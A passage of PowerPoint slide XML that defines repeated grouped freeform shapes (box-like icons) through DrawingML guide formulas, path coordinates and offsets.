                                <a:pt x="1630" y="681"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="681"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="2129"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1753"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="175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45454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73" name="Freeform 128">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BAB6CAF-86E1-4AA9-B159-EB3D859564C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E6E6E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745" name="Group 129">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AC7D29C-E2DA-45CC-B1A7-842213E8332F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 flipH="1">
                        <a:off x="1728" y="1767"/>
                        <a:ext cx="434" cy="341"/>
                        <a:chOff x="585" y="1098"/>
                        <a:chExt cx="662" cy="521"/>
                      </a:xfrm>
                    </p:grpSpPr>
                    <p:sp>
                      <p:nvSpPr>
                        <p:cNvPr id="1764" name="Freeform 130">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21891AF1-A731-4E6C-A6B3-C7502189D05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331" cy="432"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 0 w 1866"/>
                            <a:gd name="T1" fmla="*/ 500 h 2433"/>
                            <a:gd name="T2" fmla="*/ 0 w 1866"/>
                            <a:gd name="T3" fmla="*/ 2433 h 2433"/>
                            <a:gd name="T4" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T5" fmla="*/ 1932 h 2433"/>
                            <a:gd name="T6" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T7" fmla="*/ 1001 h 2433"/>
                            <a:gd name="T8" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T9" fmla="*/ 0 h 2433"/>
                            <a:gd name="T10" fmla="*/ 0 w 1866"/>
                            <a:gd name="T11" fmla="*/ 500 h 24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</a:cxnLst>
                          <a:rect l="0" t="0" r="r" b="b"/>
                          <a:pathLst>
                            <a:path w="1866" h="2433">
                              <a:moveTo>
                                <a:pt x="0" y="500"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="0" y="2433"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1932"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1001"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="0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D6D6D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65" name="Freeform 131">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{116A0FE8-80CA-4E2E-9DF7-309752C541D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3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030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66" name="Freeform 132">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C855AE6-BABE-49B0-B0C6-88DCB2777E1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916" y="1186"/>
                          <a:ext cx="331" cy="433"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 0 w 1866"/>
                            <a:gd name="T1" fmla="*/ 2434 h 2434"/>
                            <a:gd name="T2" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T3" fmla="*/ 1933 h 2434"/>
                            <a:gd name="T4" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T5" fmla="*/ 0 h 2434"/>
                            <a:gd name="T6" fmla="*/ 0 w 1866"/>
                            <a:gd name="T7" fmla="*/ 501 h 2434"/>
                            <a:gd name="T8" fmla="*/ 0 w 1866"/>
                            <a:gd name="T9" fmla="*/ 2434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0" y="2434"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1933"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="501"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="243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28282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67" name="Freeform 133">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8B07464-6FE7-4BC5-812E-8B1CCAFA93E6}"/>
                            </a:ext>
                          </a:extLst>
                        </p:cNvPr>
                        <p:cNvSpPr>
                          <a:spLocks noEditPoints="1"/>
                        </p:cNvSpPr>
                        <p:nvPr/>
                      </p:nvSpPr>
                      <p:spPr bwMode="gray">
                        <a:xfrm>
                          <a:off x="585" y="1186"/>
                          <a:ext cx="331" cy="433"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T1" fmla="*/ 501 h 2434"/>
                            <a:gd name="T2" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T3" fmla="*/ 437 h 2434"/>
                            <a:gd name="T4" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T5" fmla="*/ 437 h 2434"/>
                            <a:gd name="T6" fmla="*/ 234 w 1866"/>
                            <a:gd name="T7" fmla="*/ 64 h 2434"/>
                            <a:gd name="T8" fmla="*/ 234 w 1866"/>
                            <a:gd name="T9" fmla="*/ 64 h 2434"/>
                            <a:gd name="T10" fmla="*/ 0 w 1866"/>
                            <a:gd name="T11" fmla="*/ 0 h 2434"/>
                            <a:gd name="T12" fmla="*/ 0 w 1866"/>
                            <a:gd name="T13" fmla="*/ 1933 h 2434"/>
                            <a:gd name="T14" fmla="*/ 234 w 1866"/>
                            <a:gd name="T15" fmla="*/ 1997 h 2434"/>
                            <a:gd name="T16" fmla="*/ 234 w 1866"/>
                            <a:gd name="T17" fmla="*/ 1997 h 2434"/>
                            <a:gd name="T18" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T19" fmla="*/ 2434 h 2434"/>
                            <a:gd name="T20" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T21" fmla="*/ 501 h 2434"/>
                            <a:gd name="T22" fmla="*/ 234 w 1866"/>
                            <a:gd name="T23" fmla="*/ 1753 h 2434"/>
                            <a:gd name="T24" fmla="*/ 234 w 1866"/>
                            <a:gd name="T25" fmla="*/ 305 h 2434"/>
                            <a:gd name="T26" fmla="*/ 234 w 1866"/>
                            <a:gd name="T27" fmla="*/ 305 h 2434"/>
                            <a:gd name="T28" fmla="*/ 1630 w 1866"/>
                            <a:gd name="T29" fmla="*/ 681 h 2434"/>
                            <a:gd name="T30" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T31" fmla="*/ 681 h 2434"/>
                            <a:gd name="T32" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T33" fmla="*/ 2129 h 2434"/>
                            <a:gd name="T34" fmla="*/ 234 w 1866"/>
                            <a:gd name="T35" fmla="*/ 1753 h 2434"/>
                            <a:gd name="T36" fmla="*/ 234 w 1866"/>
                            <a:gd name="T37" fmla="*/ 1753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1866" y="501"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1632" y="437"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="437"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="64"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="64"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="1933"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1997"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1997"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="2434"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="501"/>
                              </a:lnTo>
                              <a:close/>
                              <a:moveTo>
                                <a:pt x="234" y="1753"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="234" y="305"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="305"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1630" y="681"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="681"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="2129"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1753"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="175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45454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68" name="Freeform 134">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CFD5C87-A41F-43CF-AE44-21D3B6F041C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E6E6E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746" name="Group 135">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{064AA410-611E-4A08-83A8-BFEAC98606E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 flipH="1">
                        <a:off x="1512" y="1825"/>
                        <a:ext cx="433" cy="342"/>
                        <a:chOff x="585" y="1098"/>
                        <a:chExt cx="662" cy="521"/>
                      </a:xfrm>
                    </p:grpSpPr>
                    <p:sp>
                      <p:nvSpPr>
                        <p:cNvPr id="1759" name="Freeform 136">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19991A86-1F9D-4D39-9CF2-DDB2D4D460C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331" cy="432"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 0 w 1866"/>
                            <a:gd name="T1" fmla="*/ 500 h 2433"/>
                            <a:gd name="T2" fmla="*/ 0 w 1866"/>
                            <a:gd name="T3" fmla="*/ 2433 h 2433"/>
                            <a:gd name="T4" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T5" fmla="*/ 1932 h 2433"/>
                            <a:gd name="T6" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T7" fmla="*/ 1001 h 2433"/>
                            <a:gd name="T8" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T9" fmla="*/ 0 h 2433"/>
                            <a:gd name="T10" fmla="*/ 0 w 1866"/>
                            <a:gd name="T11" fmla="*/ 500 h 24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</a:cxnLst>
                          <a:rect l="0" t="0" r="r" b="b"/>
                          <a:pathLst>
                            <a:path w="1866" h="2433">
                              <a:moveTo>
                                <a:pt x="0" y="500"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="0" y="2433"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1932"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1001"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="0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D6D6D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60" name="Freeform 137">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7A8F69F-DD93-4B2E-B648-4BFD5F04A64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3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030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61" name="Freeform 138">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{752B3BA1-393B-4662-A6E8-49037B85792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916" y="1186"/>
                          <a:ext cx="331" cy="433"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 0 w 1866"/>
                            <a:gd name="T1" fmla="*/ 2434 h 2434"/>
                            <a:gd name="T2" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T3" fmla="*/ 1933 h 2434"/>
                            <a:gd name="T4" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T5" fmla="*/ 0 h 2434"/>
                            <a:gd name="T6" fmla="*/ 0 w 1866"/>
                            <a:gd name="T7" fmla="*/ 501 h 2434"/>
                            <a:gd name="T8" fmla="*/ 0 w 1866"/>
                            <a:gd name="T9" fmla="*/ 2434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0" y="2434"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1933"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="501"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="243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28282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62" name="Freeform 139">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2FC12AE-A0E2-47B7-9E88-6D3B9B26B96A}"/>
                            </a:ext>
                          </a:extLst>
                        </p:cNvPr>
                        <p:cNvSpPr>
                          <a:spLocks noEditPoints="1"/>
                        </p:cNvSpPr>
                        <p:nvPr/>
                      </p:nvSpPr>
                      <p:spPr bwMode="gray">
                        <a:xfrm>
                          <a:off x="585" y="1186"/>
                          <a:ext cx="331" cy="433"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T1" fmla="*/ 501 h 2434"/>
                            <a:gd name="T2" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T3" fmla="*/ 437 h 2434"/>
                            <a:gd name="T4" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T5" fmla="*/ 437 h 2434"/>
                            <a:gd name="T6" fmla="*/ 234 w 1866"/>
                            <a:gd name="T7" fmla="*/ 64 h 2434"/>
                            <a:gd name="T8" fmla="*/ 234 w 1866"/>
                            <a:gd name="T9" fmla="*/ 64 h 2434"/>
                            <a:gd name="T10" fmla="*/ 0 w 1866"/>
                            <a:gd name="T11" fmla="*/ 0 h 2434"/>
                            <a:gd name="T12" fmla="*/ 0 w 1866"/>
                            <a:gd name="T13" fmla="*/ 1933 h 2434"/>
                            <a:gd name="T14" fmla="*/ 234 w 1866"/>
                            <a:gd name="T15" fmla="*/ 1997 h 2434"/>
                            <a:gd name="T16" fmla="*/ 234 w 1866"/>
                            <a:gd name="T17" fmla="*/ 1997 h 2434"/>
                            <a:gd name="T18" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T19" fmla="*/ 2434 h 2434"/>
                            <a:gd name="T20" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T21" fmla="*/ 501 h 2434"/>
                            <a:gd name="T22" fmla="*/ 234 w 1866"/>
                            <a:gd name="T23" fmla="*/ 1753 h 2434"/>
                            <a:gd name="T24" fmla="*/ 234 w 1866"/>
                            <a:gd name="T25" fmla="*/ 305 h 2434"/>
                            <a:gd name="T26" fmla="*/ 234 w 1866"/>
                            <a:gd name="T27" fmla="*/ 305 h 2434"/>
                            <a:gd name="T28" fmla="*/ 1630 w 1866"/>
                            <a:gd name="T29" fmla="*/ 681 h 2434"/>
                            <a:gd name="T30" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T31" fmla="*/ 681 h 2434"/>
                            <a:gd name="T32" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T33" fmla="*/ 2129 h 2434"/>
                            <a:gd name="T34" fmla="*/ 234 w 1866"/>
                            <a:gd name="T35" fmla="*/ 1753 h 2434"/>
                            <a:gd name="T36" fmla="*/ 234 w 1866"/>
                            <a:gd name="T37" fmla="*/ 1753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1866" y="501"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1632" y="437"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="437"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="64"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="64"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="1933"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1997"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1997"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="2434"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="501"/>
                              </a:lnTo>
                              <a:close/>
                              <a:moveTo>
                                <a:pt x="234" y="1753"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="234" y="305"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="305"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1630" y="681"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="681"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="2129"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1753"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="175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45454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63" name="Freeform 140">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A026AEF-0B8A-41B6-B33D-3677D4EE13C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E6E6E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747" name="Group 141">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{870E6678-F712-4CCB-9BA3-B0AD7789339D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 flipH="1">
                        <a:off x="1295" y="1884"/>
                        <a:ext cx="433" cy="341"/>
                        <a:chOff x="585" y="1098"/>
                        <a:chExt cx="662" cy="521"/>
                      </a:xfrm>
                    </p:grpSpPr>
                    <p:sp>
                      <p:nvSpPr>
                        <p:cNvPr id="1754" name="Freeform 142">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07861A9D-3F96-4120-A78B-86C80EFACC9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331" cy="432"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 0 w 1866"/>
                            <a:gd name="T1" fmla="*/ 500 h 2433"/>
                            <a:gd name="T2" fmla="*/ 0 w 1866"/>
                            <a:gd name="T3" fmla="*/ 2433 h 2433"/>
                            <a:gd name="T4" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T5" fmla="*/ 1932 h 2433"/>
                            <a:gd name="T6" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T7" fmla="*/ 1001 h 2433"/>
                            <a:gd name="T8" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T9" fmla="*/ 0 h 2433"/>
                            <a:gd name="T10" fmla="*/ 0 w 1866"/>
                            <a:gd name="T11" fmla="*/ 500 h 24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</a:cxnLst>
                          <a:rect l="0" t="0" r="r" b="b"/>
                          <a:pathLst>
                            <a:path w="1866" h="2433">
                              <a:moveTo>
                                <a:pt x="0" y="500"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="0" y="2433"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1932"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1001"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="0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D6D6D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55" name="Freeform 143">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{765AA930-4720-4B91-A56F-462B3A0A004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3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030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56" name="Freeform 144">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CB37818-5B65-4429-9569-FFBF8E6A8D6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916" y="1186"/>
                          <a:ext cx="331" cy="433"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 0 w 1866"/>
                            <a:gd name="T1" fmla="*/ 2434 h 2434"/>
                            <a:gd name="T2" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T3" fmla="*/ 1933 h 2434"/>
                            <a:gd name="T4" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T5" fmla="*/ 0 h 2434"/>
                            <a:gd name="T6" fmla="*/ 0 w 1866"/>
                            <a:gd name="T7" fmla="*/ 501 h 2434"/>
                            <a:gd name="T8" fmla="*/ 0 w 1866"/>
                            <a:gd name="T9" fmla="*/ 2434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0" y="2434"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1933"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="501"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="243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28282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57" name="Freeform 145">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D6AC13C-E790-477A-92EB-9C386B2EC2B0}"/>
                            </a:ext>
                          </a:extLst>
                        </p:cNvPr>
                        <p:cNvSpPr>
                          <a:spLocks noEditPoints="1"/>
                        </p:cNvSpPr>
                        <p:nvPr/>
                      </p:nvSpPr>
                      <p:spPr bwMode="gray">
                        <a:xfrm>
                          <a:off x="585" y="1186"/>
                          <a:ext cx="331" cy="433"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T1" fmla="*/ 501 h 2434"/>
                            <a:gd name="T2" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T3" fmla="*/ 437 h 2434"/>
                            <a:gd name="T4" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T5" fmla="*/ 437 h 2434"/>
                            <a:gd name="T6" fmla="*/ 234 w 1866"/>
                            <a:gd name="T7" fmla="*/ 64 h 2434"/>
                            <a:gd name="T8" fmla="*/ 234 w 1866"/>
                            <a:gd name="T9" fmla="*/ 64 h 2434"/>
                            <a:gd name="T10" fmla="*/ 0 w 1866"/>
                            <a:gd name="T11" fmla="*/ 0 h 2434"/>
                            <a:gd name="T12" fmla="*/ 0 w 1866"/>
                            <a:gd name="T13" fmla="*/ 1933 h 2434"/>
                            <a:gd name="T14" fmla="*/ 234 w 1866"/>
                            <a:gd name="T15" fmla="*/ 1997 h 2434"/>
                            <a:gd name="T16" fmla="*/ 234 w 1866"/>
                            <a:gd name="T17" fmla="*/ 1997 h 2434"/>
                            <a:gd name="T18" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T19" fmla="*/ 2434 h 2434"/>
                            <a:gd name="T20" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T21" fmla="*/ 501 h 2434"/>
                            <a:gd name="T22" fmla="*/ 234 w 1866"/>
                            <a:gd name="T23" fmla="*/ 1753 h 2434"/>
                            <a:gd name="T24" fmla="*/ 234 w 1866"/>
                            <a:gd name="T25" fmla="*/ 305 h 2434"/>
                            <a:gd name="T26" fmla="*/ 234 w 1866"/>
                            <a:gd name="T27" fmla="*/ 305 h 2434"/>
                            <a:gd name="T28" fmla="*/ 1630 w 1866"/>
                            <a:gd name="T29" fmla="*/ 681 h 2434"/>
                            <a:gd name="T30" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T31" fmla="*/ 681 h 2434"/>
                            <a:gd name="T32" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T33" fmla="*/ 2129 h 2434"/>
                            <a:gd name="T34" fmla="*/ 234 w 1866"/>
                            <a:gd name="T35" fmla="*/ 1753 h 2434"/>
                            <a:gd name="T36" fmla="*/ 234 w 1866"/>
                            <a:gd name="T37" fmla="*/ 1753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1866" y="501"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1632" y="437"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="437"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="64"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="64"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="1933"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1997"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1997"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="2434"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="501"/>
                              </a:lnTo>
                              <a:close/>
                              <a:moveTo>
                                <a:pt x="234" y="1753"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="234" y="305"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="305"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1630" y="681"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="681"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="2129"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1753"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="175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45454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58" name="Freeform 146">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{264E6E77-90D1-4287-A782-8E8429D50112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E6E6E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748" name="Group 147">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC5212FD-08E9-4185-B6D9-053D118D460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 flipH="1">
                        <a:off x="1079" y="1942"/>
                        <a:ext cx="433" cy="341"/>
                        <a:chOff x="585" y="1098"/>
                        <a:chExt cx="662" cy="521"/>
                      </a:xfrm>
                    </p:grpSpPr>
                    <p:sp>
                      <p:nvSpPr>
                        <p:cNvPr id="1749" name="Freeform 148">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0055C2A-B53E-4174-82EE-4BCFA027DF4A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331" cy="432"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 0 w 1866"/>
                            <a:gd name="T1" fmla="*/ 500 h 2433"/>
                            <a:gd name="T2" fmla="*/ 0 w 1866"/>
                            <a:gd name="T3" fmla="*/ 2433 h 2433"/>
                            <a:gd name="T4" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T5" fmla="*/ 1932 h 2433"/>
                            <a:gd name="T6" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T7" fmla="*/ 1001 h 2433"/>
                            <a:gd name="T8" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T9" fmla="*/ 0 h 2433"/>
                            <a:gd name="T10" fmla="*/ 0 w 1866"/>
                            <a:gd name="T11" fmla="*/ 500 h 243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</a:cxnLst>
                          <a:rect l="0" t="0" r="r" b="b"/>
                          <a:pathLst>
                            <a:path w="1866" h="2433">
                              <a:moveTo>
                                <a:pt x="0" y="500"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="0" y="2433"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1932"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1001"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="0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D6D6D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50" name="Freeform 149">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8BC4AAB-07BC-47AA-8516-75A65902847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3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030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51" name="Freeform 150">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CA745C6-F5E2-44FA-A08E-82D6944A79A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916" y="1186"/>
                          <a:ext cx="331" cy="433"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 0 w 1866"/>
                            <a:gd name="T1" fmla="*/ 2434 h 2434"/>
                            <a:gd name="T2" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T3" fmla="*/ 1933 h 2434"/>
                            <a:gd name="T4" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T5" fmla="*/ 0 h 2434"/>
                            <a:gd name="T6" fmla="*/ 0 w 1866"/>
                            <a:gd name="T7" fmla="*/ 501 h 2434"/>
                            <a:gd name="T8" fmla="*/ 0 w 1866"/>
